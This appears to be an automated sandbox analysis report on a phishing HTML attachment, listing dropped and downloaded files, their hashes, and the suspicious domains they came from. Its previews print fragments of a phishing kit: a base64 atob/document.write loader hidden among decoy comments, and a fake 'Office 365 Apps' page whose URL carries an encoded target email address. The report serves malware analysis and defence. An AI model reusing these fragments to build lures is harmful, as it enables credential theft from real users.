                                            Reputation:unknown
                                            Preview:L..................F.@.. ...$+.,....0.*.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGYxN....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY.N....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGY.N....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGY.N..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGY.N...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 08:52:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                            Category:dropped
                                            Size (bytes):2675
                                            Entropy (8bit):4.003216733307285
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:3D4E1B45739C0511DABA1BDEE84DAF43
                                            SHA1:35495C5D832D31A17C71C815DA109E91CBBC965E
                                            SHA-256:6CEA58A328AA9050A6E577DD99D195C50B6ADA243379A75024C78CDABB5AB41C
                                            SHA-512:CD82683523FEDC69657A9C5E1AD8E4A3E55576219178C8BE548FDF5D3DC6799F09BF35581FF305153022389E90C2505E5E2E3404E0D2973FA959CE20B7A94EB1
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGYxN....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY.N....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGY.N....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGY.N..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGY.N...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                            Category:dropped
                                            Size (bytes):2689
                                            Entropy (8bit):4.007880485583565
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:5C4777E2754C59C3DD4C0914C0DBF276
                                            SHA1:59833DDF41EAA5B21DF921E4138E3F1A0C6A8257
                                            SHA-256:5AA510EE6CEA2853A5EE37374482D55596B82353DCF28BC9920D8798325D5419
                                            SHA-512:41ED03A183EA909F83C5F69555BFCE51B1ACBFCBBE3881589CB9EC14B9449A9774546C3EB97DC6592F04873C4F64705FF723D5C81903EBDC20761A7725E2620E
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGYxN....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY.N....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGY.N....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGY.N..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 08:52:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                            Category:dropped
                                            Size (bytes):2677
                                            Entropy (8bit):3.9991174210809586
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:27E763A30C9AF307198C453121055E76
                                            SHA1:6B65746E181D01A3C1737CD5BF8ECBC01784C8E7
                                            SHA-256:C5C3F8535AB681B95ED7588912CD80C3BA1A5A7A2D599D0E366F0381150E94A0
                                            SHA-512:BD00E522273E07A2B6A9A2EE8D87E4F239DAACD3C777AF7E1A94845DFD0B92BAEDEA99B66494FF65B5CCC14D66A325C6B11F604B4AAF83B02A0505C7D5CF3657
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:L..................F.@.. ...$+.,.....k......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGYxN....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY.N....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGY.N....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGY.N..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGY.N...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 08:52:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                            Category:dropped
                                            Size (bytes):2677
                                            Entropy (8bit):3.9914128337767467
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:541F69DCD71E51B0BA571E68D7E92646
                                            SHA1:1100E1FC735C3E26E83C24E2AFF81A781D8A4709
                                            SHA-256:F9D2835F8B6993E2B577E8223CB867B9B84C23E88E09483DF6A8E7DBBFF26082
                                            SHA-512:893AE3A5BF7A054F84C7934BC6D27238EB4D5B34B022FDB343F5182FA60AA672F4C422EB701FF762253F82667DAAD92FBC1C7D736517B18437CA170EEF10A462
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:L..................F.@.. ...$+.,......#.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGYxN....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY.N....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGY.N....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGY.N..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGY.N...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 08:52:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                            Category:dropped
                                            Size (bytes):2679
                                            Entropy (8bit):3.9966013301707304
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:9C3F21507ABD5C965F28D8AEE2EF433E
                                            SHA1:3BBCE480FB2546C876AF6EB47CC2D981D5FB2C2C
                                            SHA-256:863C63D2E6003DE3F813AD1D4F65FB5C6A80BE244864C46C137105A5368C7181
                                            SHA-512:C081E391358F45363BC9ECBDE480C2BB33AD1E19D89D1221F8AB059314013128F2BBF7FAF2E0ACDEC6AF12A20FF339A4B45024BB17A081CD56DE6F25AFE296C8
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:L..................F.@.. ...$+.,....h.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGYxN....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY.N....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGY.N....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGY.N..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGY.N...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 38 x 61, 8-bit/color RGB, non-interlaced
                                            Category:downloaded
                                            Size (bytes):61
                                            Entropy (8bit):3.9697984750326016
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:C58499ADD766BC3A07692CC9FB63A27D
                                            SHA1:FD9B345E1BC2C5E65B7E8106E18B826B902AE247
                                            SHA-256:CE61BD058F192D271ABF6D02D84E93E715CD1637B6B5AB8917650790C817C835
                                            SHA-512:236CADCB927C2DD7DEB2A73345FC481A0EE2461CB8B3140812217D6BD2601E1139603C410D55942801DD73DDB3EBC72AF1E31B72242AAD8DE3244D3CBD5708B6
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cecff627db48cc5/1728294740015/DCRjwCb6NT_D3c1
                                            Preview:.PNG........IHDR...&...=.....NN......IDAT.....$.....IEND.B`.
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with very long lines (47261)
                                            Category:downloaded
                                            Size (bytes):47262
                                            Entropy (8bit):5.3974731018213795
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                            SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                            SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                            SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
                                            Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                            Category:downloaded
                                            Size (bytes):61
                                            Entropy (8bit):3.990210155325004
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:1
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with very long lines (65447)
                                            Category:downloaded
                                            Size (bytes):89501
                                            Entropy (8bit):5.289893677458563
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:SVG Scalable Vector Graphics image
                                            Category:dropped
                                            Size (bytes):6350
                                            Entropy (8bit):5.189758732055737
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:59DAD9FABCB6E02DEBA2CBA0AD76AA5F
                                            SHA1:529D83AD3BAE340E4A76A635400B74559B532AA4
                                            SHA-256:ED2A9DBED9ED7629A6BD2F5DBBFC07F1DE7272C034FACC5A449FB321A1A9E2E2
                                            SHA-512:0BDB46C9FB023473B19A9A1A014705A314D71347A89300BADFDDC0AE4BB5CED73B4B96A3976DCF96DE766BF6DDA1F40F9FD6E8FB1CE04777652FAC884B9D8A38
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="512" height="513" fill="none"><path fill="url(#a)" d="M429.439 262.847v-21.752L280.493 83.769c-12.465-13.367-34.427-13.664-46.595 0C221.729 97.433 82.561 240.796 82.561 240.796v23.045L253.9 382.953l175.539-120.106Z"/><path fill="url(#b)" fill-opacity=".7" d="M429.439 262.847v-21.752L280.493 83.769c-12.465-13.367-34.427-13.664-46.595 0C221.729 97.433 82.561 240.796 82.561 240.796v23.045L253.9 382.953l175.539-120.106Z"/><path fill="url(#c)" fill-opacity=".7" d="M429.439 262.847v-21.752L280.493 83.769c-12.465-13.367-34.427-13.664-46.595 0C221.729 97.433 82.561 240.796 82.561 240.796v23.045L253.9 382.953l175.539-120.106Z"/><path fill="url(#d)" fill-opacity=".4" d="M429.439 262.847v-21.752L280.493 83.769c-12.465-13.367-34.427-13.664-46.595 0C221.729 97.433 82.561 240.796 82.561 240.796v23.045L253.9 382.953l175.539-120.106Z"/><path fill="url(#e)" fill-opacity=".9" d="M429.439 262.847v-21.752L280.493 83.769c-12.465-13.367-34.427-13.664-46.595 0C2
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:HTML document, ASCII text, with very long lines (6521), with CRLF line terminators
                                            Category:downloaded
                                            Size (bytes):18117
                                            Entropy (8bit):5.910849046687545
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:40A896DFBB7331CD1133EB51E35474A5
                                            SHA1:D2008DD461685D2531C3DAA61F597247EC13731D
                                            SHA-256:E72E958CB1A79DA112293B659BAC106CA612C692523836353A7D57BA6016D612
                                            SHA-512:B17E471AE1143A258CCEB73D5D36FED9ACBDF996DE7EF4A63DB5DCBC890DDDFCDD4D655C89DF04ACA840701530330D5281780B6D8AC347E9C3B973D98E768938
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://lgrlfh.biguncu.ru/onistf/
                                            Preview: Don&#039;t watch the clock; do what it does. Keep going. -->.. Success is not how high you have climbed, but how you make a positive difference to the world. -->..<script>../* Your brand is what people say about you when you&#039;re not in the room. */..if(atob("aHR0cHM6Ly9sZ3JMZkguYmlndW5jdS5ydS9vbmlzdGYv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCjwhLS0gPGRpdj5BbGwgb3VyIGRyZWFtcyBjYW4gY29tZSB0cnVlIGlmIHdlIGhhdmUgdGhlIGNvdXJhZ2UgdG8gcHVyc3VlIHRoZW0uPC9kaXY+IC0tPgogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY29kZS5qcXVlcnkuY29tL2pxdWVyeS0zLjYuMC5taW4uanMiPjwvc2NyaXB0Pg0KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20vdHVybnN0aWxlL3YwL2FwaS5qcz9yZW5kZXI9ZXhwbGljaXQiPjwvc2NyaXB0Pg0KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9jcnlwdG8tanMvNC4xLjEvY3J5cHRvLWpzLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
                                            Category:dropped
                                            Size (bytes):7886
                                            Entropy (8bit):4.14434000076088
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:AC16FA7FC862073B02ACD1187FC6DEF4
                                            SHA1:F2B9A6255F6293000F30EEE272ABDD372A14E9D3
                                            SHA-256:E35D94B76894D6ECA96FF5B1A12D94DFE73485EF3C52CB5B4395BE8FFAC1CB45
                                            SHA-512:FF0884F9F3DED38191C7D1F214545509E80DE614BC824395F3C9412AED8D81DB95BA7E761939AC1F1798C1D39A7969A3DBF373D03A88404345714EDD8165F19D
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:...... .... .....6......... ............... .h...f...(... ...@..... ..........................................................................................................................................................................................................................................................................................................................(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..'.....................................(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(.....~......................................(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(.."................................................ ... ... ... ... ... ... ... .."..(..(..(..(..(..(..(..(..$.....}...............................................y...y...y...y...y...y...y...y...y...%..(..(..(..(..(..'.....|..............................
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                            Category:downloaded
                                            Size (bytes):48316
                                            Entropy (8bit):5.6346993394709
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:2CA03AD87885AB983541092B87ADB299
                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:downloaded
                                            Size (bytes):7801
                                            Entropy (8bit):4.544810664155964
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:0FAEF1B43A4A78E583BD6A60F008908C
                                            SHA1:D082016C611E790F3370F5DDC7A34FD69CD3919B
                                            SHA-256:13B3B55C497FB8E64B018806408D5A3EC3E3C3F20B9B7BFE80BC8F814CCBAC5D
                                            SHA-512:D16BDA191202CED3759125C93CCFC7440C057426671562F913EE1D3BB57777EE48025D14C0CB48DD9E13472F572AB29BC7DF71B68C25FBDC3BD687E87A524B7A
                                            Malicious:false
                                            Reputation:unknown
                                            URL:https://uwz7bwosli.boyunglee.com/n6drat55y/iu89908445/?pln=Y2ZldkBubml0LmNvbQ==
                                            Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title id="page-title">Connecting... | Office 365 Apps</title>.. .. Add the favicon here -->.. <link rel="icon" href="https://outlook.office.com/mail/favicon.ico" type="image/x-icon">.. .. <style>.. html, body {.. margin: 0;.. width: 100%;.. height: 100%;.. overflow: hidden;.. display: flex;.. justify-content: center;.. align-items: center;.. background-color: #f0f0f0;.. font-family: Arial, sans-serif;.. }.... #loading {.. position: fixed;.. top: 0;.. left: 0;.. width: 100%;.. height: 100%;.. background-color: rgba(255, 255, 255, 0.8);.. display: flex;.. flex-direction: column;.. justify-content: center
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:GIF image data, version 89a, 1200 x 160
                                            Category:dropped
                                            Size (bytes):86684
                                            Entropy (8bit):7.8571598201709305
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:7E991ECD30A090605837C06CEFA71685
                                            SHA1:64BD6EC88FF4CD4FF49CACB58841D6909BC5B5B4
                                            SHA-256:12B151886BE0626C14EA0EB26AD48D2855A350B54014B8B427EBE24441C24A18
                                            SHA-512:CA0EC442C55A5DA7EA36083E14789C73B8F11C4776C17F18A05D8906152838BC444197D35F9117E4D54501C5171A5A3ECAA0D306ABFE9F7A843DBBD1A149062A
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:GIF89a................TM.xs........aZ...lf.....ME.......!..NETSCAPE2.0.....!.......,.............I..8...`(.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z..v..z..xL....z.n...|N.....~........................................................................................................................................H......*\....#J.H....3j.... .C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....C..M....S.^....c.M....s..........N.....+_.....K.N.....k........O......_.......O..............(.....h...&....6....F(..Vh..f...v.. .(.$.h.(...,...0.(.4.h.8..<...@.).D.i.H&..L6..PF).TVi.Xf..\v..`.).d.i.h...l...p.).t.i.x..~D..!.......,............E.!.......,............E.!.......,............E.!.......,............E.!.......,............E.!.......,............E.!.......,............E.!.......,............E.!.......,............E.!.......,............E.!..
                                            File type:HTML document, Unicode text, UTF-8 text, with very long lines (34783), with CRLF line terminators
                                            Entropy (8bit):6.049664910074764
                                            TrID:
                                            • HyperText Markup Language (12001/1) 19.05%
                                            • HyperText Markup Language (12001/1) 19.05%
                                            • HyperText Markup Language (11501/1) 18.25%
                                            • HyperText Markup Language (11501/1) 18.25%
                                            • HyperText Markup Language (11001/1) 17.46%
                                            File name:cfev.-Information refb08b4d10f3ce74a317adeabab8ac66ad.htm
                                            File size:1'351'741 bytes
                                            MD5:b9cf64fdae7c62e75f5f35355c0261b9
                                            SHA1:faba41ba974d1fe8534c545935eb2eab611bee5c
